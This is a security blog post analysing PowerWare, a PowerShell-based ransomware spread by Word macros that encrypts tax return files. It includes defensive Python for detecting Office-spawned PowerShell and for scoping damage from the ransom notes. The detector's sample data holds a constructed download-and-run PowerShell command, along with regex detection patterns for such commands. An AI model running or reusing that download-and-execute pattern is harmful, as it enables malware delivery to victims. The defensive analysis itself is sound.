Tax Day Extortion: PowerWare Crypto-ransomware Targets Tax Files

Some things in life are certain, and the same can be said of cybercrime. Tax Day is drawing closer in the U.S., and as millions of Americans file their taxes, cybercriminals are stepping in to make the task profitable for themselves and painful for their victims. We have seen recent incidents of organizations falling for business email compromise (BEC) schemes related to tax filing; now online extortionists have joined the fray as well.

PowerWare (detected by Trend Micro as RANSOM_POWERWARE.A) is a new crypto-ransomware that abuses Windows PowerShell for its infection routine. Apart from encrypting the file types commonly targeted by ransomware, PowerWare also targets tax return files created by tax filing programs (for example, files with the .tax2013 and .tax2014 extensions). For users and organizations, losing current and previous years’ records is a hassle and can be costly: in the U.S., for example, taxpayers are advised to keep their tax return records for about three years after filing, because the statute of limitations for assessment of taxes and for refund claims runs for that same period.

It is also worth noting that while ransomware targeting tax-related files has been seen before, PowerWare’s technique of using a Word macro to launch PowerShell is quite uncommon.

Figure 1. Spam confuses users with “Invoice” as subject and “Financial Manager” as the sender

The infection starts when targets open a Microsoft Word document with an embedded malicious macro. This document is spread via emails, which is a common way to deliver crypto-ransomware.

The document instructs the victim to enable macros. Once they are enabled, the malicious macro executes the following code:

Figure 2. Word document instructing users to enable macros

Figure 3. Snippet of the code that calls PowerShell

As seen in the code above, the macro uses cmd.exe to launch an instance of powershell.exe. That instance connects to a website, downloads the PowerWare ransomware script (itself written in PowerShell), and saves it in the Windows Temporary folder as Y.ps1. The code then launches another PowerShell instance to run PowerWare. Note that the only payload written to disk is a PowerShell script in the user’s Temp folder, so the process chain itself (Word spawning cmd.exe, which spawns PowerShell) is the most reliable thing for defenders to watch for.
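The process chain described above (a Word macro launching cmd.exe, which launches powershell.exe to download a script into the Temp folder and run it) is visible in ordinary process-creation telemetry. The following is an added example, not code from the original post or from Trend Micro: it applies a simple ancestor-chain rule over constructed, Sysmon-Event-ID-1-style records. The field names, process GUIDs, command lines and the URL in the sample events are assumptions and are not PowerWare’s actual command lines; a benign admin chain (Explorer to cmd.exe to PowerShell) is included to show that it is not flagged.

```python
"""Flag PowerShell launched beneath an Office process, the chain PowerWare uses.

Added example, not code from the original post. Events are constructed,
Sysmon-Event-ID-1-like dicts; field names, GUIDs, command lines and the URL are
assumptions and are not PowerWare's real command lines.
"""
import ntpath
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Command-line indicators typical of a download-and-run PowerShell stage.
PS_DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|bitstransfer", re.I)
PS_TEMP_SCRIPT = re.compile(r"""(%temp%|\$env:temp|\\temp\\)[^\s"']*\.ps1""", re.I)
PS_EVASION = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|e(?:xecutionpolicy|p)?\s+bypass)", re.I)

# Constructed sample telemetry: one macro-driven chain (A*) and one benign chain (B*).
SAMPLE_EVENTS = [
    {"guid": "A0", "parent": None, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"guid": "A1", "parent": "A0", "image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n "C:\Users\bob\Downloads\Invoice.doc"'},
    {"guid": "A2", "parent": "A1", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command ..."'},
    {"guid": "A3", "parent": "A2", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "
                "\"(New-Object Net.WebClient).DownloadFile('http://example.invalid/p', '$env:TEMP\\Y.ps1')\""},
    {"guid": "A4", "parent": "A3", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\bob\\AppData\\Local\\Temp\\Y.ps1"},
    {"guid": "B0", "parent": None, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"guid": "B1", "parent": "B0", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"guid": "B2", "parent": "B1", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1"},
]


def _base(image):
    """Lower-cased executable name from a Windows path (works on any host OS)."""
    return ntpath.basename(image).lower()


def ancestors(event, by_guid, max_depth=6):
    """Image basenames of the process's ancestors, nearest parent first."""
    chain, guid = [], event["parent"]
    while guid is not None and guid in by_guid and len(chain) < max_depth:
        parent = by_guid[guid]
        chain.append(_base(parent["image"]))
        guid = parent["parent"]
    return chain


def indicators(cmdline):
    """Which download-and-run indicators appear in a PowerShell command line."""
    hits = []
    if PS_DOWNLOAD.search(cmdline):
        hits.append("download")
    if PS_TEMP_SCRIPT.search(cmdline):
        hits.append("temp_ps1")
    if PS_EVASION.search(cmdline):
        hits.append("hidden_or_bypass")
    return hits


def find_office_powershell(events):
    """Return one finding per powershell.exe whose ancestry includes an Office app."""
    by_guid = {e["guid"]: e for e in events}
    findings = []
    for e in events:
        if _base(e["image"]) != "powershell.exe":
            continue
        parents = ancestors(e, by_guid)
        office = next((p for p in parents if p in OFFICE_APPS), None)
        if office is None:
            continue  # no Office ancestor: ordinary admin or scripting use
        hits = indicators(e["cmdline"])
        # cmd.exe in the chain plus download/Temp-script indicators is the PowerWare shape.
        severity = "high" if "cmd.exe" in parents and hits else "medium"
        findings.append({
            "guid": e["guid"],
            "chain": list(reversed(parents)) + ["powershell.exe"],
            "indicators": hits,
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for finding in find_office_powershell(SAMPLE_EVENTS):
        print(finding["severity"], " -> ".join(finding["chain"]), finding["indicators"])
```

An Office process with PowerShell anywhere in its descendants is rare enough in most environments to alert on by itself; the command-line indicators mainly raise severity and help triage. Both PowerShell instances in the sample chain are flagged, including the second one, whose only parent is the first PowerShell, because the rule walks the full ancestry rather than checking the immediate parent.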

As mentioned earlier, PowerWare encrypts .tax2013 and .tax2014 files, among others, and then deletes itself. It also drops an HTML file named “FILES_ENCRYPTED-READ_ME.HTML” in every folder that contains an encrypted file, detailing how the affected user can get their files back.
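Because the ransom note is dropped in every folder that holds an encrypted file, the notes themselves are a quick way to scope an incident: which folders were reached, which tax-return files sit beside a note (and are therefore presumed encrypted), and which tax-return files survived untouched and can be copied off before recovery. The following is an added example, not code from the original post: it walks a directory tree and sorts tax-return files by whether a note is present. The sample tree is constructed inline, and the extension list contains only the two extensions the post names; add the others your tax software produces.

```python
"""Scope a PowerWare-style incident from the ransom notes it leaves behind.

Added example, not code from the original post. The sample tree is constructed;
the extension set holds only the two extensions the post names.
"""
import os
import tempfile
from collections import Counter

RANSOM_NOTE = "FILES_ENCRYPTED-READ_ME.HTML"   # note name given in the post
TAX_EXTENSIONS = {".tax2013", ".tax2014"}       # from the post; extend for your software


def triage(root):
    """Walk root and classify tax-return files by whether a ransom note sits beside them."""
    hit_dirs, hit_counts, intact = [], Counter(), []
    for dirpath, _dirs, files in os.walk(root):
        rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
        has_note = RANSOM_NOTE in {f.upper() for f in files}  # compare case-insensitively
        if has_note:
            hit_dirs.append(rel)
        for f in files:
            ext = os.path.splitext(f)[1].lower()
            if ext not in TAX_EXTENSIONS:
                continue
            if has_note:
                hit_counts[ext] += 1        # presumed encrypted: note dropped beside it
            else:
                intact.append(f"{rel}/{f}")  # no note here: candidate for immediate backup
    return {
        "hit_dirs": sorted(hit_dirs),
        "hit_tax_files": dict(hit_counts),
        "intact_tax_files": sorted(intact),
    }


def build_sample_tree():
    """Create a constructed directory layout resembling a partially hit user profile."""
    root = tempfile.mkdtemp(prefix="powerware_triage_")
    layout = {
        "docs/2013": ["return.tax2013", RANSOM_NOTE],
        "docs/2014": ["return.tax2014", "w2.pdf", RANSOM_NOTE],
        "docs": ["notes.txt"],
        "archive": ["old.tax2013"],   # never reached: no note dropped here
    }
    for rel, names in layout.items():
        d = os.path.join(root, *rel.split("/"))
        os.makedirs(d, exist_ok=True)
        for name in names:
            with open(os.path.join(d, name), "w") as fh:
                fh.write("constructed sample content\n")
    return root


if __name__ == "__main__":
    report = triage(build_sample_tree())
    print("folders with ransom note:", report["hit_dirs"])
    print("tax files beside a note:", report["hit_tax_files"])
    print("tax files with no note:", report["intact_tax_files"])
```

Run the walk once per logical drive, including any mapped network drives, since those are within the malware’s reach as well. Treat the “intact” list as a snapshot: if the infected machine is still running, copy those files off or isolate the host before doing anything else.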

The attackers demand US$500 (1.188 BTC at the time of writing), and the amount doubles if the victim fails to pay before the deadline.

Figure 4. HTML page explaining the situation to the victim

Figure 5. Ransomware payment procedures

Figure 6. Ransom payment confirmation

Although PowerWare is a new family of crypto-ransomware, it mimics CryptoWall to a certain extent: it uses the same ransom note design as CryptoWall, and the payment site’s title bar reads “CryptoWall Decript Service” [sic]. PowerWare is evidently trading on CryptoWall’s notoriety to pressure its victims.

PowerWare also enumerates all logical drives, including mapped network drives, so a single infected workstation can encrypt files on shared network storage. This makes it a major threat to large companies with little or no experience in handling crypto-ransomware.

How to be ransomware-free this tax season

Awareness of threats like this is a user’s first line of defense against ransomware. Keeping sufficient, regularly scheduled backups also limits the damage ransomware can do. We also encourage users to follow the 3-2-1 rule for backing up their files: keep at least three copies of your data, on two different types of media, with one copy stored off-site. Because PowerWare reaches mapped network drives, a backup that stays permanently mounted on the workstation offers little protection; keep the off-site or offline copy disconnected except while backing up.
